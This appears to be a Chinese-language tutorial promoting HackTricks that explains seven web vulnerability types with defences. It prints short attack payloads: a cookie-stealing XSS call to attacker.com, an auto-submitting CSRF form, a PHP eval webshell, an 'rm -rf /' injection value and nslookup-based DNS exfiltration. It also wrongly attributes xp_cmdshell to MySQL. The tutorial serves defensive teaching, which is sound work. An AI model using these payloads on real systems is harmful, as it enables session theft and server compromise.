HackTricks Web应用渗透测试实战：7大漏洞类型深度解析

【免费下载链接】hacktricks Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news. 项目地址: https://gitcode.com/GitHub_Trending/hac/hacktricks

HackTricks是一个涵盖CTF技巧、实战应用漏洞利用和安全研究的开源项目，本文将深度解析Web应用中最常见的7大漏洞类型，帮助安全测试人员和开发者掌握识别与防御方法。通过实战案例和防御策略，你将学习如何有效应对SQL注入、XSS、CSRF等高危威胁。

1. 跨站脚本攻击（XSS）：网页中的隐形炸弹

跨站脚本攻击（XSS）是最普遍的Web安全漏洞之一，攻击者通过注入恶意JavaScript代码，在受害者浏览器中执行未授权操作。Content Security Policy (CSP) 是防御XSS的重要机制，它通过定义资源加载规则限制恶意脚本执行。

图1：XSS攻击原理示意图，展示恶意脚本如何注入并执行

XSS的三种类型

• 存储型XSS：恶意代码永久存储在目标服务器（如数据库、评论区）
• 反射型XSS：恶意代码通过URL参数等方式反射给受害者
• DOM型XSS：客户端JavaScript处理不当导致的漏洞

典型利用场景

攻击者可通过XSS窃取用户Cookie、会话令牌，甚至执行键盘记录。例如，在CSP配置存在"unsafe-inline"策略时，攻击者可构造如下 payload：

<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

防御措施

• 实施严格的CSP策略，避免使用unsafe-inline和unsafe-eval
• 对用户输入进行HTML实体编码
• 使用React、Vue等现代框架的自动转义机制
• 采用HttpOnly和Secure标记保护Cookie

2. SQL注入：数据库的隐形后门

SQL注入漏洞发生在应用程序将未过滤的用户输入直接拼接到SQL查询中，攻击者可通过构造特殊输入控制数据库操作，甚至执行系统命令。

图2：SQL注入攻击流程，展示恶意查询如何操控数据库

常见注入点

• URL参数（id=1 OR 1=1）
• 表单提交数据
• HTTP头部（Referer、User-Agent等）

危害与利用

成功的SQL注入可导致：

• 数据库敏感信息泄露
• 数据篡改或删除
• 通过数据库函数执行系统命令（如MySQL的xp_cmdshell）
• 利用数据库特性实现SSRF攻击（如MySQL的LOAD_FILE函数）

防御策略

• 使用参数化查询或预编译语句
• 实施最小权限原则配置数据库账户
• 对输入进行严格过滤和验证
• 定期进行安全审计和漏洞扫描

3. 跨站请求伪造（CSRF）：身份盗窃的隐形之手

跨站请求伪造（CSRF）利用受害者的身份凭证，在其不知情的情况下执行未授权操作。攻击通常通过诱导用户点击恶意链接或访问恶意页面发起。

图3：CSRF攻击原理，展示攻击者如何利用用户身份执行操作

攻击特征

• 利用浏览器自动携带Cookie的特性
• 通常涉及状态修改操作（转账、修改密码等）
• 难以追踪攻击源

典型攻击场景

在包含CSRF漏洞的网站中，攻击者可构造如下自动提交的表单：

<form action="https://victim.com/change-email" method="POST">
  <input type="hidden" name="email" value="attacker@example.com">
  <input type="hidden" name="antiCSRFToken" value="fake-token">
</form>
<script>document.forms[0].submit();</script>

防御措施

• 实现Anti-CSRF Token机制
• 使用SameSite Cookie属性
• 验证Referer/Origin请求头
• 实施二次验证（如验证码、密码确认）

4. 服务器端请求伪造（SSRF）：内网探测的隐形通道

服务器端请求伪造（SSRF）允许攻击者诱导服务器发起非预期的网络请求，通常用于探测内网服务、访问敏感资源或执行端口扫描。

图4：SSRF攻击路径，展示如何通过服务器访问内部资源

常见触发点

• URL参数（如图片加载、API调用）
• 文件导入功能
• 第三方服务集成（如在线翻译、地图服务）

利用方式

• 访问云服务元数据接口（如AWS的http://169.254.169.254/latest/meta-data/）
• 扫描内网端口和服务
• 通过数据库函数发起请求（如MySQL的LOAD_FILE、MSSQL的xp_dirtree）
• 结合其他漏洞实现RCE（远程代码执行）

防御策略

• 实施严格的URL白名单验证
• 禁止请求内网IP地址和特殊域名
• 使用DNS解析缓存和IP地址过滤
• 限制服务器出站网络连接

5. 文件上传漏洞：服务器沦陷的隐形入口

文件上传漏洞允许攻击者上传恶意文件（如Webshell）到服务器，通常导致远程代码执行。此类漏洞常出现在头像上传、文档分享等功能中。

图5：文件上传漏洞利用流程，展示恶意文件如何突破验证

常见绕过技术

• 修改文件扩展名（如.php.jpg、.php%00.jpg）
• 构造文件内容欺骗类型检测（如添加GIF文件头）
• 利用服务器配置缺陷（如Apache的.htaccess解析漏洞）
• 上传 polyglot 文件（兼具多种文件类型特征）

危害实例

攻击者上传伪装成图片的PHP webshell：

<?php @eval($_POST['cmd']); ?>

通过访问该文件即可获得服务器控制权。

防御措施

• 验证文件类型（结合MIME类型和文件内容检测）
• 使用随机文件名和安全存储路径
• 限制文件权限和执行权限
• 部署Web应用防火墙（WAF）

6. 命令注入：系统控制权的隐形抢夺

命令注入漏洞允许攻击者在服务器上执行任意系统命令，通常由于应用程序将用户输入直接传递给系统命令执行函数（如system()、exec()）。

典型漏洞代码

$dir = $_GET['dir'];
system("ls -l " . $dir);

当dir参数为; rm -rf /时将执行恶意命令。

常见利用技巧

• 使用分号;、管道|、逻辑运算符&&/||连接命令
• 利用命令替换$(command)或反引号`command`
• 绕过过滤（如使用Base64编码、命令分隔符变异）
• 结合DNS外带数据（如nslookup $(whoami).attacker.com）

防御策略

• 避免直接使用用户输入构建命令
• 使用白名单限制允许的参数值
• 采用安全的API替代系统命令（如PHP的glob()替代ls）
• 实施命令执行沙箱

7. 路径遍历：文件系统的隐形窥探

路径遍历漏洞允许攻击者访问预期之外的文件系统路径，通常通过操纵文件路径参数实现，可能导致敏感文件泄露。

常见攻击向量

• ../../etc/passwd
• ..%2f..%2fetc%2fpasswd（URL编码绕过）
• ....//....//etc/passwd（多重遍历绕过）

危害案例

通过路径遍历获取服务器配置文件：

https://example.com/download?file=../../../../etc/apache2/apache2.conf

防御措施

• 对用户输入进行严格的路径规范化
• 使用基础目录检查（如realpath()验证）
• 禁止使用用户输入直接构建文件路径
• 限制文件访问权限

总结：构建Web应用安全防线

Web应用安全需要多层次防御策略，包括安全编码实践、输入验证、输出编码、最小权限原则和定期安全测试。HackTricks项目提供了丰富的实战案例和技术细节，完整内容可通过以下方式获取：

git clone https://gitcode.com/gh_mirrors/ha/hacktricks

通过持续学习和实践，开发者和安全测试人员可以有效识别和防御这些常见漏洞，构建更安全的Web应用。记住，安全是一个持续过程，需要不断更新知识和工具来应对新兴威胁。

图6：Web应用安全防御体系示意图

【免费下载链接】hacktricks Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news. 项目地址: https://gitcode.com/GitHub_Trending/hac/hacktricks